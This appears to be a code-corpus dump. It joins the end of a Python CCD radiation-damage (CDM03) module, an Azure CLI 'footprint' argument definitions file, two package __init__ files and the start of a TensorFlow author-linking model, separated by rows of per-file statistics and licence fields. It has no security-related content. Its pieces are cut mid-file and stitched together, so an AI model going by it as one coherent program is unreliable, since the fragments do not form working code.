dob : input float
rdose : input float
in_nt : input rank-1 array('d') with bounds (zdim)
in_sigma : input rank-1 array('d') with bounds (zdim)
in_tr : input rank-1 array('d') with bounds (zdim)
Optional arguments:
xdim := shape(sinp,0) input int
ydim := shape(sinp,1) input int
zdim := len(in_nt) input int
Return objects:
sout : rank-2 array('d') with bounds (xdim,ydim)
.. Note:: Because Python/NumPy arrays are different row/column based, one needs
to be extra careful here. NumPy.asfortranarray will be called to get
an array laid out in Fortran order in memory. Before returning the
array will be laid out in memory in C-style (row-major order).
:return: image that has been run through the CDM03 model
:rtype: ndarray
"""
#read in trap information
trapdata = np.loadtxt(self.values['trapfile'])
nt = trapdata[:, 0]
sigma = trapdata[:, 1]
taur = trapdata[:, 2]
iflip = iquadrant / 2
jflip = iquadrant % 2
if self.logger:
self.log.info('nt=' + str(nt))
self.log.info('sigma= ' + str(sigma))
self.log.info('taur= ' + str(taur))
self.log.info('dob=%f' % self.values['dob'])
self.log.info('rdose=%e' % self.values['rdose'])
self.log.info('xsize=%i' % data.shape[1])
self.log.info('ysize=%i' % data.shape[0])
self.log.info('quadrant=%i' % iquadrant)
self.log.info('iflip=%i' % iflip)
self.log.info('jflip=%i' % jflip)
#call Fortran routine
CTIed = cdm03.cdm03(np.asfortranarray(data),
iflip, jflip,
self.values['dob'], self.values['rdose'],
nt, sigma, taur)
return np.asanyarray(CTIed)
# class CDM03Python():
# def __init__(self, input, data, log=None):
# """
# Class constructor.
#
# :param data: input data to be radiated
# :type data: ndarray
# :param input: input parameters
# :type input: dictionary
# :param log: instance to Python logging
# :type log: logging instance
# """
# self.data = data
# self.values = dict(quads=(0, 1, 2, 3), xsize=2048, ysize=2066, dob=0.0, rdose=8.0e9)
# self.values.update(input)
# self.log = log
# self._setupLogger()
#
#
# def _setupLogger(self):
# """
# Set up the logger.
# """
# self.logger = True
# if self.log is None:
# self.logger = False
#
#
# def radiateFullCCD(self):
# """
# This routine allows the whole CCD to be run through a radiation damage mode.
# The routine takes into account the fact that the amplifiers are in the corners
# of the CCD. The routine assumes that the CCD is using four amplifiers.
#
# There is an excess of .copy() calls, which should probably be cleaned up. However,
# given that I had problem with the Fortran code, I have kept the calls. If memory
# becomes an issue then this should be cleaned.
#
# :return: radiation damaged image
# :rtype: ndarray
# """
# ydim, xdim = self.data.shape
# out = np.zeros((xdim, ydim))
#
# #transpose the data, because Python has different convention than Fortran
# data = self.data.transpose().copy()
#
# for quad in self.values['quads']:
# if self.logger:
# self.log.info('Adding CTI to Q%i' % quad)
#
# if quad == 0:
# d = data[0:self.values['xsize'], 0:self.values['ysize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[0:self.values['xsize'], 0:self.values['ysize']] = tmp
# elif quad == 1:
# d = data[self.values['xsize']:, :self.values['ysize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['xsize']:, :self.values['ysize']] = tmp
# elif quad == 2:
# d = data[:self.values['xsize'], self.values['ysize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[:self.values['xsize'], self.values['ysize']:] = tmp
# elif quad == 3:
# d = data[self.values['xsize']:, self.values['ysize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['xsize']:, self.values['ysize']:] = tmp
# else:
# print 'ERROR -- too many quadrants!!'
# self.log.error('Too many quadrants! This method allows only four quadrants.')
#
# return out.transpose()
#
#
# def radiateFullCCD2(self):
# """
# This routine allows the whole CCD to be run through a radiation damage mode.
# The routine takes into account the fact that the amplifiers are in the corners
# of the CCD. The routine assumes that the CCD is using four amplifiers.
#
# There is an excess of .copy() calls, which should probably be cleaned up. However,
# given that I had problem with the Fortran code, I have kept the calls. If memory
# becomes an issue then this should be cleaned.
#
# :return: radiation damaged image
# :rtype: ndarray
# """
# ydim, xdim = self.data.shape
# out = np.empty((ydim, xdim))
#
# #transpose the data, because Python has different convention than Fortran
# data = self.data.copy()
#
# for quad in self.values['quads']:
# if self.logger:
# self.log.info('Adding CTI to Q%i' % quad)
#
# if quad == 0:
# d = data[:self.values['ysize'], :self.values['xsize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[:self.values['ysize'], :self.values['xsize']] = tmp
# elif quad == 1:
# d = data[:self.values['ysize'], self.values['xsize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[:self.values['ysize'], self.values['xsize']:] = tmp
# elif quad == 2:
# d = data[self.values['ysize']:, :self.values['xsize']].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['ysize']:, :self.values['xsize']] = tmp
# elif quad == 3:
# d = data[self.values['ysize']:, self.values['xsize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['ysize']:, self.values['xsize']:] = tmp
# else:
# print 'ERROR -- too many quadrants!!'
# self.log.error('Too many quadrants! This method allows only four quadrants.')
#
# return out
#
#
# def applyRadiationDamage(self, data, nt_p, sigma_p, taur_p, nt_s, sigma_s, taur_s, rdose=1.6e10, iquadrant=0):
# """
# Apply radian damage based on FORTRAN CDM03 model. The method assumes that
# input data covers only a single quadrant defined by the iquadrant integer.
#
# :param data: imaging data to which the CDM03 model will be applied to.
# :type data: ndarray
#
# :param iquandrant: number of the quadrant to process
# :type iquandrant: int
#
# :return: image that has been run through the CDM03 model
# :rtype: ndarray
# """
# iflip = iquadrant / 2
# jflip = iquadrant % 2
#
# if self.logger:
# self.log.info('nt_p=' + str(nt_p))
# self.log.info('nt_s=' + str(nt_s))
# self.log.info('sigma_p= ' + str(sigma_p))
# self.log.info('sigma_s= ' + str(sigma_s))
# self.log.info('taur_p= ' + str(taur_p))
# self.log.info('taur_s= ' + str(taur_s))
# self.log.info('dob=%f' % self.values['dob'])
# self.log.info('rdose=%e' % self.values['rdose'])
# self.log.info('xsize=%i' % data.shape[1])
# self.log.info('ysize=%i' % data.shape[0])
# self.log.info('quadrant=%i' % iquadrant)
# self.log.info('iflip=%i' % iflip)
# self.log.info('jflip=%i' % jflip)
#
# #return run(data, nt_s, sigma_p, taur_p, nt_s, sigma_s, taur_s, iflip, jflip, True, True)
# return run(data)#, [nt_s, sigma_p, taur_p, nt_s, sigma_s, taur_s, iflip, jflip, 1, 1])
#
#
# @autojit
# #@jit(double[:,:], double[:], double[:], double[:], double[:], double[:], double[:], int, int, int, int)
# #def run(image, nt_p, sigma_p, tr_p, nt_s, sigma_s, tr_s, iflip, jflip, parallel, serial):
# #@jit(argtypes=[double[:,:], [double[:], double[:], double[:], double[:], double[:], double[:], int16, int16, int16, int16]])
# #def run(image, params):
# #@jit(argtypes=double[:,:], restype=double[:,:])
# def run(image):
# parallel = 'cdm_euclid_parallel.dat'
# serial = 'cdm_euclid_serial.dat'
# trapdata = np.loadtxt(parallel)
# nt_p = trapdata[:, 0]
# sigma_p = trapdata[:, 1]
# tr_p = trapdata[:, 2]
#
# trapdata = np.loadtxt(serial)
# nt_s = trapdata[:, 0]
# sigma_s = trapdata[:, 1]
# tr_s = trapdata[:, 2]
#
# iflip = 0
# jflip = 0
# parallel = True
# serial = True
#
# rdose = 8.0e9; dob = 0.0; beta_p = 0.6; beta_s = 0.6
# fwc = 200000.; vth = 1.168e7; vg = 6.e-11; t = 20.48e-3
# sfwc = 730000.; svg = 1.0e-10; st = 5.0e-6
#
# # absolute trap density which should be scaled according to radiation dose
# # (nt=1.5e10 gives approx fit to GH data for a dose of 8e9 10MeV equiv. protons)
# nt_p = nt_p * rdose #absolute trap density [per cm**3]
# nt_s = nt_s * rdose #absolute trap density [per cm**3]
#
# #array sizes
# ydim, xdim = image.shape
# zdim_p = len(nt_p)
# zdim_s = len(nt_s)
#
# #work arrays
# #s = np.zeros_like(image)
# no = np.zeros_like(image, dtype=np.float64)
# sno = np.zeros_like(image,dtype=np.float64)
# sout = np.zeros_like(image,dtype=np.float64)
#
# #flip data for Euclid depending on the quadrant being processed and
# #rotate (j, i slip in s) to move from Euclid to Gaia coordinate system
# #because this is what is assumed in CDM03 (EUCLID_TN_ESA_AS_003_0-2.pdf)
# #for i in range(xdim):
# # for j in range(ydim):
# # s[j, i] = image[i+iflip*(xdim+1-2*i), j+jflip*(ydim+1-2*j)]
# s = image.copy()
#
# #add background electrons
# s += dob
#
# #apply FWC (anti-blooming)
# msk = s > fwc
# s[msk] = fwc
#
# #start with parallel direction
# if parallel:
# print 'adding parallel'
# alpha_p = t*sigma_p*vth*fwc**beta_p/2./vg
# g_p = nt_p*2.*vg/fwc**beta_p
#
# for i in range(ydim):
# print i
# gamm_p = g_p * i
# for k in range(zdim_p):
# for j in range(xdim):
# nc = 0.
#
# if s[i, j] > 0.01:
# nc = max((gamm_p[k]*s[i,j]**beta_p - no[j,k])/(gamm_p[k]*s[i,j]**(beta_p - 1.) + 1.) *
# (1.-np.exp(-alpha_p[k]*s[i,j]**(1.-beta_p))), 0.0)
#
# no[j,k] = no[j,k] + nc
# nr = no[j,k] * (1. - np.exp(-t/tr_p[k]))
# s[i,j] = s[i,j] - nc + nr
# no[j,k] = no[j,k] - nr
#
# #now serial direction
# if serial:
# print 'adding serial'
# alpha_s=st*sigma_s*vth*sfwc**beta_s/2./svg
# g_s=nt_s*2.*svg/sfwc**beta_s
#
# for j in range(xdim):
# print j
# gamm_s = g_s * j
# for k in range(zdim_s):
# if tr_s[k] < t:
# for i in range(ydim):
# nc = 0.
#
# if s[i,j] > 0.01:
# nc = max((gamm_s[k]*s[i,j]**beta_s-sno[i,k])/(gamm_s[k]*s[i,j]**(beta_s-1.)+1.) *
# (1.-np.exp(-alpha_s[k]*s[i,j]**(1.-beta_s))), 0.)
#
# sno[i,k] = sno[i,k] + nc
# nr = sno[i,k] * (1. - np.exp(-st/tr_s[k]))
# s[i,j] = s[i,j] - nc + nr
# sno[i,k] = sno[i,k] - nr
#
#
# # We need to rotate back from Gaia coordinate system and
# # flip data back to the input orientation
# for i in range(ydim):
# for j in range(xdim):
# sout[i+iflip*(xdim+1-2*i), j+jflip*(ydim+1-2*j)] = s[j, i]
#
# return sout
| 40.702156
| 127
| 0.54932
| 3,877
| 30,201
| 4.235233
| 0.092597
| 0.075518
| 0.043849
| 0.045311
| 0.842996
| 0.8257
| 0.8081
| 0.790438
| 0.7662
| 0.754324
| 0
| 0.01962
| 0.31989
| 30,201
| 742
| 128
| 40.702156
| 0.779796
| 0.370286
| 0
| 0.724771
| 0
| 0
| 0.109382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.022936
| null | null | 0.027523
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8c231197640a223590afdf184652cb63e91b1f79
| 115
|
py
|
Python
|
loqusdb/build_models/__init__.py
|
bjhall/loqusdb
|
55ee806662848eeffd266bf65d4b4eb24e534a89
|
[
"MIT"
] | 4
|
2018-06-04T12:42:45.000Z
|
2021-03-29T20:36:12.000Z
|
loqusdb/build_models/__init__.py
|
bjhall/loqusdb
|
55ee806662848eeffd266bf65d4b4eb24e534a89
|
[
"MIT"
] | 50
|
2016-02-26T07:54:39.000Z
|
2021-10-12T07:52:01.000Z
|
loqusdb/build_models/__init__.py
|
bjhall/loqusdb
|
55ee806662848eeffd266bf65d4b4eb24e534a89
|
[
"MIT"
] | 8
|
2016-02-29T13:50:46.000Z
|
2020-04-22T10:15:23.000Z
|
from .case import build_case
from .variant import build_variant
from .profile_variant import build_profile_variant
| 28.75
| 50
| 0.869565
| 17
| 115
| 5.588235
| 0.352941
| 0.347368
| 0.378947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104348
| 115
| 3
| 51
| 38.333333
| 0.92233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fbedd56ba9ba1a4eec0e53d1d78049d6335d4de
| 13,886
|
py
|
Python
|
src/footprint/azext_footprint/generated/_params.py
|
amecodegenbot/azure-cli-extensions
|
bea863256d7c6ba84ceaeca7df12c34d87f80477
|
[
"MIT"
] | null | null | null |
src/footprint/azext_footprint/generated/_params.py
|
amecodegenbot/azure-cli-extensions
|
bea863256d7c6ba84ceaeca7df12c34d87f80477
|
[
"MIT"
] | null | null | null |
src/footprint/azext_footprint/generated/_params.py
|
amecodegenbot/azure-cli-extensions
|
bea863256d7c6ba84ceaeca7df12c34d87f80477
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_enum_type,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import get_default_location_from_resource_group
def load_arguments(self, _):
with self.argument_context('footprint profile list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('footprint profile show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.', id_part='name')
with self.argument_context('footprint profile create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.')
c.argument('tags', tags_type)
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('description', type=str, help='The description of the Footprint profile.')
c.argument('start_delay_milliseconds', type=int, help='The delay in milliseconds that the clients should wait '
'for until they start performing measurements.')
c.argument('measurement_count', type=int, help='The number of measurements to perform.')
c.argument('cold_path_sampling_percentage_rate', type=float, help='The default sampling percentage for cold '
'path measurement storage.')
c.argument('reporting_endpoints', nargs='*', help='The endpoints which to upload measurements to.')
with self.argument_context('footprint profile update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.', id_part='name')
c.argument('tags', tags_type)
with self.argument_context('footprint profile delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.', id_part='name')
with self.argument_context('footprint measurement-endpoint list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
with self.argument_context('footprint measurement-endpoint show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.', id_part='child_name_1')
with self.argument_context('footprint measurement-endpoint create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.')
c.argument('description', type=str, help='The description of a measurement endpoint.')
c.argument('endpoint', type=str, help='The value of a measurement endpoint.')
c.argument('measurement_type', type=int, help='The type of a measurement endpoint.')
c.argument('weight', type=int, help='The weight of a measurement endpoint, higher weight means higher '
'priority.')
c.argument('experiment_id', type=str, help='The id of an experiment that a measurement endpoint is part of.')
c.argument('object_path', type=str, help='The path of the object that a measurement endpoint points to.')
c.argument('start_time_utc', help='The start time that a measurement endpoint should be served.')
c.argument('end_time_utc', help='The end time that a measurement endpoint should be served.')
c.argument('hot_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the hot '
'path logging of a measurement endpoint.')
c.argument('warm_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the warm '
'path logging of a measurement endpoint.')
c.argument('cold_path_sampling_percentage_rate_override', type=float, help='The percentual sampling rate for '
'the cold path logging of a measurement endpoint.')
c.argument('metadata', type=str, help='The metadata of a measurement endpoint.')
with self.argument_context('footprint measurement-endpoint update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.', id_part='child_name_1')
c.argument('description', type=str, help='The description of a measurement endpoint.')
c.argument('endpoint', type=str, help='The value of a measurement endpoint.')
c.argument('measurement_type', type=int, help='The type of a measurement endpoint.')
c.argument('weight', type=int, help='The weight of a measurement endpoint, higher weight means higher '
'priority.')
c.argument('experiment_id', type=str, help='The id of an experiment that a measurement endpoint is part of.')
c.argument('object_path', type=str, help='The path of the object that a measurement endpoint points to.')
c.argument('start_time_utc', help='The start time that a measurement endpoint should be served.')
c.argument('end_time_utc', help='The end time that a measurement endpoint should be served.')
c.argument('hot_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the hot '
'path logging of a measurement endpoint.')
c.argument('warm_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the warm '
'path logging of a measurement endpoint.')
c.argument('cold_path_sampling_percentage_rate_override', type=float, help='The percentual sampling rate for '
'the cold path logging of a measurement endpoint.')
c.argument('metadata', type=str, help='The metadata of a measurement endpoint.')
with self.argument_context('footprint measurement-endpoint delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.', id_part='child_name_1')
with self.argument_context('footprint measurement-endpoint-condition list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.')
with self.argument_context('footprint measurement-endpoint-condition show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.',
id_part='child_name_1')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.',
id_part='child_name_2')
with self.argument_context('footprint measurement-endpoint-condition create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.')
c.argument('variable', type=str, help='The variable of a Footprint measurement endpoint condition.')
c.argument('operator',
arg_type=get_enum_type(['IsExactValue', 'MatchValueIgnoreCasing', 'ContainsValue',
'ContainsValueIgnoreCasing', 'DoesNotContainValue',
'DoesNotContainValueIgnoreCasing']),
help='The operator of a Footprint measurement endpoint condition.')
c.argument('constant', type=str, help='The constant of a Footprint measurement endpoint condition.')
with self.argument_context('footprint measurement-endpoint-condition update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.',
id_part='child_name_1')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.',
id_part='child_name_2')
c.argument('variable', type=str, help='The variable of a Footprint measurement endpoint condition.')
c.argument('operator',
arg_type=get_enum_type(['IsExactValue', 'MatchValueIgnoreCasing', 'ContainsValue',
'ContainsValueIgnoreCasing', 'DoesNotContainValue',
'DoesNotContainValueIgnoreCasing']),
help='The operator of a Footprint measurement endpoint condition. Swagger name=operator')
c.argument('constant', type=str, help='The constant of a Footprint measurement endpoint condition.')
with self.argument_context('footprint measurement-endpoint-condition delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.',
id_part='child_name_1')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.',
id_part='child_name_2')
with self.argument_context('footprint experiment list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
with self.argument_context('footprint experiment show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.', id_part='child_name_1')
with self.argument_context('footprint experiment create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.')
c.argument('description', type=str, help='The description of a Footprint experiment.')
with self.argument_context('footprint experiment update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.', id_part='child_name_1')
c.argument('description', type=str, help='The description of a Footprint experiment.')
with self.argument_context('footprint experiment delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.', id_part='child_name_1')
| 70.846939
| 119
| 0.68335
| 1,750
| 13,886
| 5.248
| 0.085714
| 0.094077
| 0.06348
| 0.058798
| 0.910932
| 0.903528
| 0.883384
| 0.870971
| 0.853767
| 0.84865
| 0
| 0.001075
| 0.196097
| 13,886
| 195
| 120
| 71.210256
| 0.821643
| 0.03644
| 0
| 0.745342
| 0
| 0
| 0.489677
| 0.060518
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006211
| false
| 0
| 0.012422
| 0
| 0.018634
| 0.403727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
4fc61f47f3eef6a2a4ec8c5909b8fb3b03a3725d
| 208
|
py
|
Python
|
src/dmt/__init__.py
|
SINTEF/dmt-gen-common
|
4f1ce6c303edbdcd25b69dc02c55b492540cd262
|
[
"MIT"
] | null | null | null |
src/dmt/__init__.py
|
SINTEF/dmt-gen-common
|
4f1ce6c303edbdcd25b69dc02c55b492540cd262
|
[
"MIT"
] | null | null | null |
src/dmt/__init__.py
|
SINTEF/dmt-gen-common
|
4f1ce6c303edbdcd25b69dc02c55b492540cd262
|
[
"MIT"
] | null | null | null |
from .package_generator import PackageGenerator
from .base_generator import BaseGenerator
from .basic_template_generator import BasicTemplateGenerator
from .template_generator import TemplateBasedGenerator
| 52
| 61
| 0.894231
| 21
| 208
| 8.619048
| 0.52381
| 0.331492
| 0.254144
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086538
| 208
| 4
| 62
| 52
| 0.952632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fdcf3f21348cebde8464ce55748204753a3c34d
| 10,835
|
py
|
Python
|
aid/models.py
|
noa/naacl2021
|
8ca2fe6d49571d89965cebde237bc4751cc7c75a
|
[
"Apache-2.0"
] | 2
|
2021-05-30T20:39:41.000Z
|
2021-11-15T10:33:13.000Z
|
aid/models.py
|
noa/naacl2021
|
8ca2fe6d49571d89965cebde237bc4751cc7c75a
|
[
"Apache-2.0"
] | null | null | null |
aid/models.py
|
noa/naacl2021
|
8ca2fe6d49571d89965cebde237bc4751cc7c75a
|
[
"Apache-2.0"
] | 1
|
2021-06-14T14:53:38.000Z
|
2021-06-14T14:53:38.000Z
|
# Copyright 2021 Johns Hopkins University. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Embedding
from tensorflow.keras.layers import Conv1D
from tensorflow.keras.layers import SeparableConv1D
from tensorflow_addons.layers import GroupNormalization
from aid.features import F
from aid.layers import SimpleAttentionEncoder
from aid.layers import LayerNormalizedProjection
class LinkModel(tf.keras.Model):
def __init__(self, num_symbols=None, num_action_types=None,
padded_length=None, episode_len=16,
embedding_dim=512, num_layers=2, d_model=256,
num_heads=4, dff=256, dropout_rate=0.1,
subword_embed_dim=512, action_embed_dim=512,
filter_activation='relu', num_filters=256,
min_filter_width=2, max_filter_width=5,
final_activation='relu', use_gn=False, use_GLU=False,
use_attn_text_encoder=False,
use_separable_conv=False, time_encoding='one_hot',
**kwargs):
super(LinkModel, self).__init__(**kwargs)
self.embedding_dim = embedding_dim
self.num_symbols = num_symbols
self.num_action_types = num_action_types
self.padded_length = padded_length
self.episode_len = episode_len
self.num_layers = num_layers
self.d_model = d_model
self.num_heads = num_heads
self.dff = dff
self.dropout_rate = dropout_rate
self.subword_embed_dim = subword_embed_dim
self.action_embed_dim = action_embed_dim
self.min_filter_width = min_filter_width
self.max_filter_width = max_filter_width
self.num_filters = num_filters
self.filter_activation = filter_activation
self.final_activation = final_activation
self.use_gn = use_gn
self.use_GLU = use_GLU
self.use_attn_text_encoder = use_attn_text_encoder
self.time_encoding = time_encoding
self.use_separable_conv = use_separable_conv
self.subword_embedding = Embedding(self.num_symbols, self.subword_embed_dim,
name='subword_embedding')
self.action_embedding = Embedding(self.num_action_types,
self.action_embed_dim,
name='action_embedding')
if self.use_attn_text_encoder:
self.attn_text_encoder = SimpleAttentionEncoder(d_model=self.subword_embed_dim,
num_layers=self.num_layers)
else:
for width in range(self.min_filter_width, self.max_filter_width + 1):
if self.use_separable_conv:
conv = SeparableConv1D(self.num_filters, width,
depth_multiplier=1, activation=self.filter_activation)
else:
conv = Conv1D(self.num_filters, width, activation=self.filter_activation)
setattr(self, f'conv_{width}', conv)
if self.use_gn:
setattr(self, f'norm_{width}', GroupNormalization())
self.dense_1 = Dense(self.d_model)
self.encoder = SimpleAttentionEncoder(d_model=self.d_model, num_layers=self.num_layers)
self.mlp = LayerNormalizedProjection(self.embedding_dim,
activation=self.final_activation)
@tf.function
def call(self, inputs, training=False):
features = []
# Extract text features
net = inputs[F.SYMBOLS.value]
batch_size = tf.shape(net)[0]
episode_len = tf.shape(net)[1]
net = tf.reshape(net, [-1, self.padded_length])
swe = self.subword_embedding(net)
if self.use_attn_text_encoder:
net = self.attn_text_encoder(swe, training=training)
else:
fs = []
for width in range(self.min_filter_width, self.max_filter_width + 1):
layer = getattr(self, f'conv_{width}')
net = layer(swe)
if self.use_gn:
layer_norm = getattr(self, f'norm_{width}')
net = layer_norm(net)
net = tf.reduce_max(net, axis=1, keepdims=False)
fs.append(net)
net = tf.concat(fs, axis=-1)
feature_dim = net.get_shape()[-1]
net = tf.reshape(net, [batch_size, episode_len, feature_dim])
features.append(net)
# Action embedding
embedded_actions = self.action_embedding(inputs[F.ACTION_TYPE.value])
features.append(embedded_actions)
# Hour embedding
hour = inputs[F.HOUR.value]
features.append(tf.one_hot(hour, 24, dtype=tf.float32, name='hour_onehot'))
lengths = inputs[F.NUM_POSTS.value]
lengths = tf.reshape(lengths, [batch_size])
mask = tf.sequence_mask(lengths, maxlen=episode_len)
# Day embedding
if F.DAY.value in inputs:
features.append(tf.one_hot(inputs[F.DAY.value], 7, dtype=tf.float32, name='day_onehot'))
net = tf.concat(features, axis=-1)
net = self.dense_1(net) # [batch_size, dim]
net = self.encoder(net, training=training, mask=mask)
net = self.mlp(net, training=training)
return net
class LinkTextTimeModel(tf.keras.Model):
def __init__(self, num_symbols=None, num_action_types=None,
padded_length=None, episode_len=16,
embedding_dim=512, num_layers=2, d_model=256,
num_heads=4, dff=256, dropout_rate=0.1,
subword_embed_dim=512, action_embed_dim=512,
filter_activation='relu', num_filters=256,
min_filter_width=2, max_filter_width=5,
final_activation='relu', use_gn=False, use_GLU=False,
use_attn_text_encoder=False,
use_separable_conv=False, time_encoding='one_hot',
**kwargs):
super(LinkTextTimeModel, self).__init__(**kwargs)
self.embedding_dim = embedding_dim
self.num_symbols = num_symbols
self.num_action_types = num_action_types
self.padded_length = padded_length
